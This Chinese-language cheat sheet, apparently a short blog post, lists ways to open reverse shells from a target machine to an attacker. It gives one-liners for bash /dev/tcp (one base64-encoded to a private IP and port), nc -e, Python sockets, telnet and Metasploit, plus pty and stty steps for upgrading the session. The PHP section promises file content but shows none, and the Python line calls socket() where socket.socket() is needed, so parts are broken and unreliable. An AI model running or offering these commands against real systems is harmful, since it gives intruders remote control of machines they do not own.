各种shell反弹方法

1.利用bash进行反弹shell

        先使用nc进行监听 nc -lvvp port端口号

        再在目标机器执行bash -i >& /dev/tcp/攻击ip/端口 0>&1 

        bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjcvMjIzMyAwPiYx}|{base64,-d}|{bash,-i}

2.使用nc进行反弹shell

        nc -e /bin/bash  攻击IP 端口

3.使用python反弹shell

        python -c 'import socket,subprocess,os;s=socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击ip",port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

4.利用msf进行反弹

        直接设置payload即可,tcp_reverse等

        若遇到反弹回来的shell有乱码,可以输入chcp 65001解决

5.使用telnet进行反弹

        telnet ip port 0a

6.使用php反弹shell

        需要先上传一个php文件,然后在客户端访问并且加参

        文件内容:

       

        传参:

        post方式,ip=???&port=???即可

7.得到会话后,利用python升级成完全交互

        python -c 'import pty; pty.spawn("/bin/bash")'

        退出

        stty raw -echo

你可能感兴趣的:(linux,网络安全,安全,web安全,bash)